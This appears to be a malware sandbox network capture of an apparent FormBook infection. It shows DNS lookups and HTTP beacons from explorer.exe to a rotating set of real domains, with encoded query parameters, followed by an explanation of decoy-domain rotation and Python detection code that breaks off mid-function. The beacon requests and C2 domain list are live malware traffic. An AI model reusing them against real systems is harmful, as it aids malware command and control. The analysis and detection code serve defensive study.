Apr 12, 2021 14:43:35.537502050 CEST | 56064 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:35.589127064 CEST | 53 | 56064 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:39.826991081 CEST | 63744 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:39.904122114 CEST | 53 | 63744 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:42.907236099 CEST | 61457 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:42.957482100 CEST | 53 | 61457 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:45.090725899 CEST | 58367 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:45.153116941 CEST | 53 | 58367 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:50.263797045 CEST | 60599 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:50.325995922 CEST | 53 | 60599 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:43:55.518405914 CEST | 59571 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:43:55.720928907 CEST | 53 | 59571 | 8.8.8.8 | 192.168.2.7
Apr 12, 2021 14:44:01.391340971 CEST | 52689 | 53 | 192.168.2.7 | 8.8.8.8
Apr 12, 2021 14:44:01.439821959 CEST | 53 | 52689 | 8.8.8.8 | 192.168.2.7

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 14:42:34.022248030 CEST | 192.168.2.7 | 8.8.8.8 | 0x3d29 | Standard query (0) | www.modomo.amsterdam | A (IP address) | IN (0x0001)
Apr 12, 2021 14:42:39.103795052 CEST | 192.168.2.7 | 8.8.8.8 | 0xc6af | Standard query (0) | www.zq2003.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:42:50.307725906 CEST | 192.168.2.7 | 8.8.8.8 | 0xd981 | Standard query (0) | www.gxjljc.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:42:55.714190006 CEST | 192.168.2.7 | 8.8.8.8 | 0xde48 | Standard query (0) | www.betralifcannabis.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:06.027095079 CEST | 192.168.2.7 | 8.8.8.8 | 0x69eb | Standard query (0) | www.2elden.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:11.829840899 CEST | 192.168.2.7 | 8.8.8.8 | 0x3f94 | Standard query (0) | www.landreclaim.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:17.205431938 CEST | 192.168.2.7 | 8.8.8.8 | 0xaa2a | Standard query (0) | www.rememberingedward.info | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:22.446202040 CEST | 192.168.2.7 | 8.8.8.8 | 0xd51e | Standard query (0) | www.chuanyangwenhua.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:28.843533993 CEST | 192.168.2.7 | 8.8.8.8 | 0xb9cb | Standard query (0) | www.bestflowersandgifts.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:34.106187105 CEST | 192.168.2.7 | 8.8.8.8 | 0xc823 | Standard query (0) | www.mirgran.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:39.826991081 CEST | 192.168.2.7 | 8.8.8.8 | 0x135d | Standard query (0) | www.sci-mfg.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:45.090725899 CEST | 192.168.2.7 | 8.8.8.8 | 0xf5a2 | Standard query (0) | www.yashasvsaluja.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:50.263797045 CEST | 192.168.2.7 | 8.8.8.8 | 0xcc30 | Standard query (0) | www.sexichef.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:55.518405914 CEST | 192.168.2.7 | 8.8.8.8 | 0x5ffc | Standard query (0) | www.realunitystudio.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:01.391340971 CEST | 192.168.2.7 | 8.8.8.8 | 0xbe57 | Standard query (0) | www.modomo.amsterdam | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 14:42:34.084567070 CEST | 8.8.8.8 | 192.168.2.7 | 0x3d29 | Name error (3) | www.modomo.amsterdam | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 14:42:39.162935972 CEST | 8.8.8.8 | 192.168.2.7 | 0xc6af | No error (0) | www.zq2003.com | | 47.105.113.141 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:42:50.700989962 CEST | 8.8.8.8 | 192.168.2.7 | 0xd981 | Name error (3) | www.gxjljc.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 14:42:55.790788889 CEST | 8.8.8.8 | 192.168.2.7 | 0xde48 | No error (0) | www.betralifcannabis.com | betralifcannabis.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:42:55.790788889 CEST | 8.8.8.8 | 192.168.2.7 | 0xde48 | No error (0) | betralifcannabis.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:06.085716963 CEST | 8.8.8.8 | 192.168.2.7 | 0x69eb | No error (0) | www.2elden.com | | 156.226.160.56 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:11.907810926 CEST | 8.8.8.8 | 192.168.2.7 | 0x3f94 | No error (0) | www.landreclaim.com | | 198.50.252.64 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:17.301090002 CEST | 8.8.8.8 | 192.168.2.7 | 0xaa2a | No error (0) | www.rememberingedward.info | rememberingedward.info | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:17.301090002 CEST | 8.8.8.8 | 192.168.2.7 | 0xaa2a | No error (0) | rememberingedward.info | | 160.153.136.3 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:23.328795910 CEST | 8.8.8.8 | 192.168.2.7 | 0xd51e | No error (0) | www.chuanyangwenhua.com | chuanyangw21.h.bdy.smp11.cn | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:23.328795910 CEST | 8.8.8.8 | 192.168.2.7 | 0xd51e | No error (0) | chuanyangw21.h.bdy.smp11.cn | bdy.gz01.bdysite.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:23.328795910 CEST | 8.8.8.8 | 192.168.2.7 | 0xd51e | No error (0) | bdy.gz01.bdysite.com | gz01.bch.baidu-itm.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:23.328795910 CEST | 8.8.8.8 | 192.168.2.7 | 0xd51e | No error (0) | gz01.bch.baidu-itm.com | | 14.215.190.65 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:28.919328928 CEST | 8.8.8.8 | 192.168.2.7 | 0xb9cb | No error (0) | www.bestflowersandgifts.com | bestflowersandgifts.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:28.919328928 CEST | 8.8.8.8 | 192.168.2.7 | 0xb9cb | No error (0) | bestflowersandgifts.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:34.814937115 CEST | 8.8.8.8 | 192.168.2.7 | 0xc823 | Server failure (2) | www.mirgran.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:39.904122114 CEST | 8.8.8.8 | 192.168.2.7 | 0x135d | No error (0) | www.sci-mfg.com | sci-mfg.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:39.904122114 CEST | 8.8.8.8 | 192.168.2.7 | 0x135d | No error (0) | sci-mfg.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:45.153116941 CEST | 8.8.8.8 | 192.168.2.7 | 0xf5a2 | No error (0) | www.yashasvsaluja.com | yashasvsaluja.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:45.153116941 CEST | 8.8.8.8 | 192.168.2.7 | 0xf5a2 | No error (0) | yashasvsaluja.com | | 192.0.78.25 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:45.153116941 CEST | 8.8.8.8 | 192.168.2.7 | 0xf5a2 | No error (0) | yashasvsaluja.com | | 192.0.78.24 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:50.325995922 CEST | 8.8.8.8 | 192.168.2.7 | 0xcc30 | No error (0) | www.sexichef.com | sexichef.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:43:50.325995922 CEST | 8.8.8.8 | 192.168.2.7 | 0xcc30 | No error (0) | sexichef.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:43:55.720928907 CEST | 8.8.8.8 | 192.168.2.7 | 0x5ffc | No error (0) | www.realunitystudio.com | | 204.11.56.48 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:01.439821959 CEST | 8.8.8.8 | 192.168.2.7 | 0xbe57 | Name error (3) | www.modomo.amsterdam | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.zq2003.com
• www.betralifcannabis.com
• www.2elden.com
• www.landreclaim.com
• www.rememberingedward.info
• www.chuanyangwenhua.com
• www.bestflowersandgifts.com
• www.sci-mfg.com
• www.sexichef.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49705 | 47.105.113.141 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:42:39.589682102 CEST | 1341 | OUT | GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1
Host: www.zq2003.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 14:42:40.012196064 CEST | 1342 | IN | HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 12:42:39 GMT
Server: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49712 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:42:55.833060026 CEST | 1619 | OUT | GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1
Host: www.betralifcannabis.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 14:42:55.970349073 CEST | 1626 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 12 Apr 2021 12:42:55 GMT
Content-Type: text/html
Content-Length: 275
ETag: "607068c2-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49724 | 156.226.160.56 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:43:06.316806078 CEST | 7243 | OUT | GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1
Host: www.2elden.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 14:43:09.141789913 CEST | 7244 | IN | HTTP/1.1 302 Moved Temporarily
Date: Mon, 12 Apr 2021 12:43:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=r893585h6frffsmmhi15aetfq1; path=/
Upgrade: h2
Connection: Upgrade, close
Location: /
Content-Length: 0
Content-Type: text/html; charset=gbk


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49725 | 198.50.252.64 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:43:12.049977064 CEST | 7245 | OUT | GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1
Host: www.landreclaim.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 14:43:12.192271948 CEST | 7246 | IN | HTTP/1.1 200 OK
Date: Mon, 12 Apr 2021 12:43:12 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Ascii: 1d73<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Domain parked by OnlyDomains</title><meta name="description" content=""><meta name="keywords" content=""><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"><link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous"><style>*{margin:0;padding:0; box-sizing: border-box;}*::after, *::before { box-sizing: border-box; }a, a:link, a:visited { color: #FF5850; }html, body {height:100%;width:100%; overflow-x: hidden;font-family: Inter, Arial, sans-serif; font-size: 16px;
Apr 12, 2021 14:43:12.192353964 CEST | 7247 | IN
Data Ascii: line-height: 1.42857 }p, ul, ul li { font-family: Inter; }table {height:100%;width:100%;border-collapse:collapse;border-spacing: 0;}iframe {height:100%;width:100%}img { border: none; }p { margin: 0 0 10px; }.header {border-bottom:
Apr 12, 2021 14:43:12.192392111 CEST | 7249 | IN
Data Ascii: x){.parking-p { margin: 0 60px 0 15px; }.parking-p a { font-size: 15px; margin-bottom: 30px; }.parking-p-b { margin: 0 60px 0 10px; }.parking-text { padding: 15px 0; }td, th { display: inline-block; padding: 0 0 0 5px; width: 10
Apr 12, 2021 14:43:12.192430019 CEST | 7250 | IN
Data Ascii: padding {padding-left: 80px;}}@media(max-width: 480px){.heading-padding {padding-left: 0;}}@media only screen and (max-width: 512px){.icons {margin: 15px 0 0;}.icons i { padding: 12px; }.header h2 {
Apr 12, 2021 14:43:12.192467928 CEST | 7251 | IN
Data Ascii: fa-twitter"></i></a></span></h2></td></tr> </tbody></table> </td></tr> <tr bgcolor="#FFF8F1"><td class="parking-text"> <table><tbody><tr><td width="300px" style="text-align:left;"><div class="parki
Apr 12, 2021 14:43:12.192502975 CEST | 7253 | IN
Data Ascii: </h2><ul><li><span class="glyphicon" aria-hidden="true">&#10004;</span> 99% UPTIME Network Guarantee</li><li><span class="glyphicon" aria-hidden="true">&#10004;</span> Ultra Fast Network</li><li><span class="glyp


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.7 | 49726 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:43:17.353806019 CEST | 7254 | OUT | GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1
Host: www.rememberingedward.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 14:43:17.404323101 CEST | 7254 | IN | HTTP/1.1 302 Found
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.7 | 49727 | 14.215.190.65 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:43:23.581275940 CEST | 7255 | OUT | GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1
Host: www.chuanyangwenhua.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 12, 2021 14:43:23.831491947 CEST | 7255 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Mon, 12 Apr 2021 12:43:23 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Set-Cookie: BAEID=FDD9965F60D324C96ADED23F19A33FCC; expires=Tue, 12-Apr-22 12:43:23 GMT; max-age=31536000; path=/; version=1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Apr 12, 2021 14:43:24.032521963 CEST | 7256 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Mon, 12 Apr 2021 12:43:23 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Set-Cookie: BAEID=FDD9965F60D324C96ADED23F19A33FCC; expires=Tue, 12-Apr-22 12:43:23 GMT; max-age=31536000; path=/; version=1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                               6 | 192.168.2.7 | 49728 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                               Timestamp | kBytes transferred | Direction | Data
                                                                               Apr 12, 2021 14:43:28.962619066 CEST | 7257 | OUT | GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1
                                                                               Host: www.bestflowersandgifts.com
                                                                               Connection: close
                                                                               Data Raw: 00 00 00 00 00 00 00
                                                                               Data Ascii:
                                                                               Apr 12, 2021 14:43:29.099579096 CEST | 7258 | IN | HTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "60704793-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                               7 | 192.168.2.7 | 49733 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                               Timestamp | kBytes transferred | Direction | Data
                                                                               Apr 12, 2021 14:43:39.946073055 CEST | 7302 | OUT | GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1
                                                                               Host: www.sci-mfg.com
                                                                               Connection: close
                                                                               Data Raw: 00 00 00 00 00 00 00
                                                                               Data Ascii:
                                                                               Apr 12, 2021 14:43:40.083059072 CEST | 7303 | IN | HTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:40 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "607068c2-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                               8 | 192.168.2.7 | 49736 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                               Timestamp | kBytes transferred | Direction | Data
                                                                               Apr 12, 2021 14:43:50.370038033 CEST | 7318 | OUT | GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1
                                                                               Host: www.sexichef.com
                                                                               Connection: close
                                                                               Data Raw: 00 00 00 00 00 00 00
                                                                               Data Ascii:
                                                                               Apr 12, 2021 14:43:50.506458044 CEST | 7319 | IN | HTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Mon, 12 Apr 2021 12:43:50 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "60737c38-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
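
The three explorer.exe sessions above share everything except the Host header and the second query parameter: the path is /ma3c/ each time, the first parameter is always nflpdH=xVJtBJipx, and all three hosts resolve to 34.102.136.180 and answer 403 through a Google front end (Via: 1.1 google). FormBook walks a list of domains of which most are decoys, so a 403 from any one of them says nothing about whether the live C2 was reached; a hunt that keys on a single host misses the point. The following Python, added here as an example and not code from the report, the sample or any FormBook tooling, clusters requests by the part that does not change (path plus first parameter) and flags a cluster when it spans several hosts and originates from a process that is not a browser. The session records are constructed from the page, the chrome.exe control entry and the browser allowlist are assumptions.

```python
"""Cluster HTTP requests by their fixed beacon shape across rotating hosts.

Added example built from the three explorer.exe sessions in the report."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed from report sessions 6, 7 and 8: request line, Host header,
# destination address, originating process and the HTTP status of the reply.
SESSIONS = [
    {"id": 6, "process": r"C:\Windows\explorer.exe", "dst": "34.102.136.180", "status": 403,
     "host": "www.bestflowersandgifts.com",
     "request": "GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1"},
    {"id": 7, "process": r"C:\Windows\explorer.exe", "dst": "34.102.136.180", "status": 403,
     "host": "www.sci-mfg.com",
     "request": "GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1"},
    {"id": 8, "process": r"C:\Windows\explorer.exe", "dst": "34.102.136.180", "status": 403,
     "host": "www.sexichef.com",
     "request": "GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1"},
    # Constructed benign control (assumed): a browser fetching one page from one host.
    {"id": 99, "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst": "203.0.113.10", "status": 200, "host": "www.example.com",
     "request": "GET /search?q=flowers HTTP/1.1"},
]

# Assumed allowlist of processes expected to talk HTTP on a workstation.
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into method, path and an ordered list of
    (name, value) query pairs. Parsed by hand rather than with parse_qs so the
    '+' and '/' characters in the opaque second parameter are left untouched."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    pairs = []
    for item in parts.query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return method, parts.path, pairs


def beacon_key(session):
    """The stable part of a request: path plus first parameter name and value."""
    _method, path, pairs = parse_request_line(session["request"])
    if not pairs:
        return None
    return (path, pairs[0][0], pairs[0][1])


def suspicious_clusters(sessions, min_hosts=2):
    """Group sessions by beacon_key and return the groups that reach at least
    min_hosts distinct Host values from at least one non-browser process."""
    groups = defaultdict(list)
    for s in sessions:
        key = beacon_key(s)
        if key is not None:
            groups[key].append(s)
    out = []
    for key, members in groups.items():
        hosts = {m["host"] for m in members}
        procs = {m["process"] for m in members}
        non_browser = {p for p in procs if p.rsplit("\\", 1)[-1].lower() not in BROWSERS}
        if len(hosts) >= min_hosts and non_browser:
            out.append({"key": key, "hosts": hosts, "processes": procs,
                        "destinations": {m["dst"] for m in members},
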